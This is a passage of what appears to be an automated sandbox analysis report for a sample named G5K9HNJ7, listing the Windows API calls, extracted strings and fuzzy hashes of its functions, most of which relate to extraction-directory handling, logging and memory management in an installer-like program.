                                                              • _memset.LIBCMT ref: 00218622
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00218667
                                                              • _memset.LIBCMT ref: 0021867A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Name_memset$ComputerFileModule
                                                              • String ID: --- logging level: %s ---$=== Logging started: %S ===$Executable: %S v%d.%d.%d.%d$standard
                                                              • API String ID: 949451329-1073105773
                                                              • Opcode ID: e2a24ee81ecb196f543ddf7752dc9ec5dd3cd20433df38fa06f12f19c036c8a3
                                                              • Instruction ID: 6f639a9c4d25a74ecfa5456d17580cf980317ac3bdabf064c3f864de7707926a
                                                              • Opcode Fuzzy Hash: e2a24ee81ecb196f543ddf7752dc9ec5dd3cd20433df38fa06f12f19c036c8a3
                                                              • Instruction Fuzzy Hash: 8531ABF1D1022D6BCB209B559C85EDBB7FCEB54700F1041B5B608E2142DE705EE58FA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(002396F0,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A476
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A494
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A497
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4AC
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4AF
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4C4
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4C7
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4EF
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4F2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess$ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 128005546-0
                                                              • Opcode ID: 88232dd828cb894baebe34743c0ff61321df2bd772b6649f3ff6350d22cc3d89
                                                              • Instruction ID: 92ee548c34348c3c0d79748f2b28b7e120212f708608cf5bf46effe2ccf50ecc
                                                              • Opcode Fuzzy Hash: 88232dd828cb894baebe34743c0ff61321df2bd772b6649f3ff6350d22cc3d89
                                                              • Instruction Fuzzy Hash: AD014470722212A6EB207FB69D4DFA736DC9FB0B91F544011FD04D6185DAB4DCE08A72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000082,00000000,00217016,0023BEF0,?,?,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000), ref: 00216FD6
                                                              • DialogBoxParamW.USER32(00000000,?,?,00216F09,?), ref: 00216FDD
                                                              Strings
                                                              • Failed while running the extract directory selection dialog., xrefs: 00216FE9
                                                              • Failed to get current directory, xrefs: 00216F8F
                                                              • Failed to select current directory for extraction, xrefs: 00216FA0
                                                              • Failed to select the user-specified directory for extraction, xrefs: 00216FFA
                                                              • Failed to select temporary directory for extraction, xrefs: 00216FB8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: DialogHandleModuleParam
                                                              • String ID: Failed to get current directory$Failed to select current directory for extraction$Failed to select temporary directory for extraction$Failed to select the user-specified directory for extraction$Failed while running the extract directory selection dialog.
                                                              • API String ID: 3900296288-2402499859
                                                              • Opcode ID: 12dd797395199f1dcdc39544eeca66e85c5e8f85a159c2eca981309d6c83e0e1
                                                              • Instruction ID: 18ab9dc9ce766d2870bf6b2d52f29e63cc1f0245c63842522013120174228bb4
                                                              • Opcode Fuzzy Hash: 12dd797395199f1dcdc39544eeca66e85c5e8f85a159c2eca981309d6c83e0e1
                                                              • Instruction Fuzzy Hash: 87112932978710AE8F326E14AC49CFE73E9DAB57703210116F845A6441A9618DF34A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,?,00000000,?,00000208,?,?,?,?), ref: 00219A98
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00219AA4
                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00219AD0
                                                              • GetFileVersionInfoW.KERNELBASE(?,?,00000000,00000000,?,?,?,?), ref: 00219AEC
                                                              • VerQueryValueW.VERSION(?,002150AC,?,?,?,?,?,?), ref: 00219B06
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00219B10
                                                              • GlobalFree.KERNEL32(?), ref: 00219B49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileGlobalInfoLastVersion$AllocFreeQuerySizeValue
                                                              • String ID:
                                                              • API String ID: 2886811419-0
                                                              • Opcode ID: 51449f72dff1b1323fa491dc29341d60fe6704f611b04ecf7f4bb23ae8694839
                                                              • Instruction ID: 7404d53ad51a91b142919831ea1afcdeb9d15f3d1d9dc7ba40fed0870407eae3
                                                              • Opcode Fuzzy Hash: 51449f72dff1b1323fa491dc29341d60fe6704f611b04ecf7f4bb23ae8694839
                                                              • Instruction Fuzzy Hash: 9D315276D14126EFCB109F94E8888EDBBB4EB24310B154179EE06E7210D6315EE09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000004,?,?,10/4/2023, 15:57:52,?,?,?,?,002184C0,?,?,00000000,?,00218526,?), ref: 00218738
                                                              • WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218762
                                                              • WriteFile.KERNELBASE(00214DA4,00000002,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218787
                                                              • GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0021878D
                                                              • GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 002187BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$lstrlen
                                                              • String ID: 10/4/2023, 15:57:52
                                                              • API String ID: 3048800281-3636290887
                                                              • Opcode ID: fed268e7a14d920034467c571477749a4c779273949df7f3b07ad5a82cedb231
                                                              • Instruction ID: 2848853b420b443d54a126278abc8fe8ae7297e9cad870f1d5d48810df22b114
                                                              • Opcode Fuzzy Hash: fed268e7a14d920034467c571477749a4c779273949df7f3b07ad5a82cedb231
                                                              • Instruction Fuzzy Hash: 80218B7991010AFFCB109F65DC899EEBBF9EF54390F248425F909D6190DB358AA1CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___set_flsgetvalue.LIBCMT ref: 002337D4
                                                              • __calloc_crt.LIBCMT ref: 002337E0
                                                              • __getptd.LIBCMT ref: 002337ED
                                                              • CreateThread.KERNELBASE(?,?,00233745,00000000,?,?), ref: 00233824
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0023382E
                                                              • _free.LIBCMT ref: 00233837
                                                              • __dosmaperr.LIBCMT ref: 00233842
                                                                • Part of subcall function 0022B059: __getptd_noexit.LIBCMT ref: 0022B059
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 155776804-0
                                                              • Opcode ID: d54791215a48ebed072aa45f3a774baf8aeba198d6a3bd7040f0dede648f0bc2
                                                              • Instruction ID: 5c19ace3d505d398c83ed3df91423d9e3da5125924d71957d7ff22d905f2bff2
                                                              • Opcode Fuzzy Hash: d54791215a48ebed072aa45f3a774baf8aeba198d6a3bd7040f0dede648f0bc2
                                                              • Instruction Fuzzy Hash: A61125B26203167FDB11EFE4FC4699B7B98DF14770B104426FA1496591DB71CB308A61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(0023BF10,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021691B
                                                              • LeaveCriticalSection.KERNEL32(0023BF10,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021692C
                                                              • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00216940
                                                              • WaitForSingleObject.KERNEL32(00000278,000000FF,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216952
                                                              • DeleteCriticalSection.KERNEL32(0023BF10,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021696D
                                                              • CloseHandle.KERNEL32(00000278,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216998
                                                              • CloseHandle.KERNEL32(00000274,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 002169A4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveMessageObjectPostSingleWait
                                                              • String ID:
                                                              • API String ID: 2807184951-0
                                                              • Opcode ID: ea2cc767e9d725a38bc3912ff7a717c25e5a88881001be319343e36a6a1d9fc9
                                                              • Instruction ID: 854fcedff44db3b2bd270f6e37626c4854a029ffe40d94269be7901da361506d
                                                              • Opcode Fuzzy Hash: ea2cc767e9d725a38bc3912ff7a717c25e5a88881001be319343e36a6a1d9fc9
                                                              • Instruction Fuzzy Hash: BD118B70920262DBC7218F69BD8C9DA77EAB7A47617344606F914F2224DB7588E08B60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___set_flsgetvalue.LIBCMT ref: 0023374B
                                                                • Part of subcall function 0022A57F: TlsGetValue.KERNEL32(?,00233750), ref: 0022A588
                                                                • Part of subcall function 0022A57F: _DecodePointerInternal@4.G5K9HNJ7(?,00233750), ref: 0022A59A
                                                                • Part of subcall function 0022A57F: TlsSetValue.KERNEL32(00000000,?,00233750), ref: 0022A5A9
                                                              • ___fls_getvalue@4.LIBCMT ref: 00233756
                                                                • Part of subcall function 0022A555: TlsGetValue.KERNEL32(?,?,0023375B,00000000), ref: 0022A563
                                                              • ___fls_setvalue@8.LIBCMT ref: 00233769
                                                                • Part of subcall function 0022A5B8: _DecodePointerInternal@4.G5K9HNJ7(?,?,?,0023376E,00000000,?,00000000), ref: 0022A5C9
                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00233772
                                                              • ExitThread.KERNEL32 ref: 00233779
                                                              • GetCurrentThreadId.KERNEL32 ref: 0023377F
                                                              • __freefls@4.LIBCMT ref: 0023379F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                              • String ID:
                                                              • API String ID: 3864649970-0
                                                              • Opcode ID: 7e8afa181cba2dd9655173c3f9c71c52a98dc325ffa1c0a5254a07d5d3aee572
                                                              • Instruction ID: 621d8d810e0e87acf59b32156e0716d095a546049abdb005f8631dcce015d260
                                                              • Opcode Fuzzy Hash: 7e8afa181cba2dd9655173c3f9c71c52a98dc325ffa1c0a5254a07d5d3aee572
                                                              • Instruction Fuzzy Hash: DCF062F4C20250BFC704FFB1E90988FBBA9AF583007108518F9048B212DA34DA628E92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: /="$M="$V8"$k="$z="
                                                              • API String ID: 431132790-2650672009
                                                              • Opcode ID: e41209eeda0ca83940c47c4366db01ac3496d667dc849c7ae2db34e25a1e56c7
                                                              • Instruction ID: 56f764a44e5c3afad8df87376aad82c2f841c7690775fc629c6dcb9a8487f9c3
                                                              • Opcode Fuzzy Hash: e41209eeda0ca83940c47c4366db01ac3496d667dc849c7ae2db34e25a1e56c7
                                                              • Instruction Fuzzy Hash: FD017CB1120A16EBC710EF64E908649FBF1BF50311F508258E0188B661DBB0E9B4CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,00000038,00000000,?,00000000,?,00000008,00000008,?,00216163,?,?,?,00000000,00000000), ref: 00219E0D
                                                              • HeapAlloc.KERNEL32(00000000,?,00216163,?,?,?,00000000,00000000), ref: 00219E14
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 3a9e60ceaa6e341342624e40792268ad9d875c1069935206b989e28f7d61f0fa
                                                              • Instruction ID: 7cf0cbbfafd2f4ac5d1ebfcd8f89ddb168fd8ce726dbb188498a784977207088
                                                              • Opcode Fuzzy Hash: 3a9e60ceaa6e341342624e40792268ad9d875c1069935206b989e28f7d61f0fa
                                                              • Instruction Fuzzy Hash: 0A310936520206DFDF10DF64C854A9A77E5EFA4360B26802AF9098F241DB71ECE1CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _memset.LIBCMT ref: 0021B9AC
                                                              • _strcpy_s.LIBCMT ref: 0021B9BD
                                                                • Part of subcall function 0021B580: __get_errno.LIBCMT ref: 0021B58E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __get_errno_memset_strcpy_s
                                                              • String ID: @
                                                              • API String ID: 179418724-2766056989
                                                              • Opcode ID: 41cf61d0c30ce23761258c2198008d3be492f4594770155e919c187adad70524
                                                              • Instruction ID: 997944a7dbf914d3e2577d7b2e288e637dc4acbec339a738e57f0a431afd2ef1
                                                              • Opcode Fuzzy Hash: 41cf61d0c30ce23761258c2198008d3be492f4594770155e919c187adad70524
                                                              • Instruction Fuzzy Hash: 91818BB5514202AFC700EF64D88499AFBF4FFA8324F108A1DF95997261D731EDA1CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • UuidCreate.RPCRT4(?), ref: 00217496
                                                              • UuidToStringW.RPCRT4(?,00000000), ref: 002174C3
                                                              • RpcStringFreeW.RPCRT4(00000000), ref: 002174FF
                                                              Strings
                                                              • Failed to convert GUID to string., xrefs: 002174D7
                                                              • Failed to create a new GUID., xrefs: 002174B4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: StringUuid$CreateFree
                                                              • String ID: Failed to convert GUID to string.$Failed to create a new GUID.
                                                              • API String ID: 3044360575-1364151769
                                                              • Opcode ID: d447e4a16b6dd9fe7a01f7c828e5bf916beb734eb5f45aa22210b12da994e3ae
                                                              • Instruction ID: f29684f349ba76098af66646593112340294f3be076fa82ee4b3306573222409
                                                              • Opcode Fuzzy Hash: d447e4a16b6dd9fe7a01f7c828e5bf916beb734eb5f45aa22210b12da994e3ae
                                                              • Instruction Fuzzy Hash: F211BC71B2421AABDB109FF9DC89AEFB7F9AB6C310F104435EA05E3140DA78D4948B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 0022CDB5: __FF_MSGBANNER.LIBCMT ref: 0022CDCE
                                                                • Part of subcall function 0022CDB5: __NMSG_WRITE.LIBCMT ref: 0022CDD5
                                                                • Part of subcall function 0022CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022CDFA
                                                              • std::exception::exception.LIBCMT ref: 00233635
                                                              • std::exception::exception.LIBCMT ref: 0023364F
                                                              • __CxxThrowException@8.LIBCMT ref: 00233660
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID: bad allocation
                                                              • API String ID: 615853336-2104205924
                                                              • Opcode ID: 3411c39d979486b3138daf07b33917c2913b6658d9d8fa934001870438a0744d
                                                              • Instruction ID: 8a5fc37da0ee2a6bb697be251aefd239657b0507e24312ef368f16d78ac4da94
                                                              • Opcode Fuzzy Hash: 3411c39d979486b3138daf07b33917c2913b6658d9d8fa934001870438a0744d
                                                              • Instruction Fuzzy Hash: 6E01F7B2934219AACB00EF54E807AAE7BBC9B85714F940015F50496191DBB09B75CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000000,?,00000000,0023BEF0,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53), ref: 002191F9
                                                              • CreateDirectoryW.KERNELBASE(00000000,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?), ref: 00219210
                                                              • GetLastError.KERNEL32(?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 0021921E
                                                                • Part of subcall function 002191D3: CreateDirectoryW.KERNEL32(00000000,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?), ref: 00219273
                                                                • Part of subcall function 002191D3: GetLastError.KERNEL32(?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 0021927D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast$AttributesFile
                                                              • String ID:
                                                              • API String ID: 925696554-0
                                                              • Opcode ID: 7695efbfb773677d8db4ea3da3d49f45b807ca8eda68bd6ad0392ce90b601bce
                                                              • Instruction ID: d5628d570c40eac8c17af7ef40e472cb4492884b7869e141b5c4deddef1d4a8d
                                                              • Opcode Fuzzy Hash: 7695efbfb773677d8db4ea3da3d49f45b807ca8eda68bd6ad0392ce90b601bce
                                                              • Instruction Fuzzy Hash: 2F21F236920203BBEB201F64EC65BEA36D9EFB43A0F354025ED49D6050DA76CDE29250
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0021F965
                                                                • Part of subcall function 00222C43: __CxxThrowException@8.LIBCMT ref: 00222C6A
                                                                • Part of subcall function 00222C43: _memmove.LIBCMT ref: 00222CBB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw_memmove
                                                              • String ID: kQ"$lU!
                                                              • API String ID: 3426943727-2369180469
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 0021CA78: GetSystemInfo.KERNELBASE(?), ref: 0021CACB
                                                              • _memset.LIBCMT ref: 0021BDC4
                                                              • _strcpy_s.LIBCMT ref: 0021BDCE
                                                              • _strcat_s.LIBCMT ref: 0021BDD8
                                                                • Part of subcall function 0021B580: __get_errno.LIBCMT ref: 0021B58E
                                                              Strings
                                                              Similarity
                                                              • API ID: InfoSystem__get_errno_malloc_memset_strcat_s_strcpy_s
                                                              • String ID: W
                                                              • API String ID: 3172754772-655174618
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _memset.LIBCMT ref: 002176D2
                                                              • QueryDosDeviceW.KERNELBASE(?,?,00000400,?,00000000,?), ref: 002176EB
                                                              Strings
                                                              Similarity
                                                              • API ID: DeviceQuery_memset
                                                              • String ID: harddisk$ramdisk
                                                              • API String ID: 2562551966-3524468269
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000024,002164D8,?,0021654C,?,00000024,?,0021AFDF,00000007,?,?,00000000,00000000,?,?), ref: 00216616
                                                              • SendMessageW.USER32(00008001,00000000,00000000,00000000), ref: 00216683
                                                              Strings
                                                              • Failed to add file name on to status prefix: %S, xrefs: 00216654
                                                              • %s..., xrefs: 0021668B
                                                              Similarity
                                                              • API ID: HandleMessageModuleSend
                                                              • String ID: %s...$Failed to add file name on to status prefix: %S
                                                              • API String ID: 1379669478-1181359081
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog3_memmove
                                                              • String ID:
                                                              • API String ID: 1268875249-3916222277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000080,?,00000024,?,0021AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00216560
                                                              Strings
                                                              • Unable ro register file for clean-up, xrefs: 00216574
                                                              • User canceled extraction..., xrefs: 002165BB
                                                              Similarity
                                                              • API ID: AttributesFile
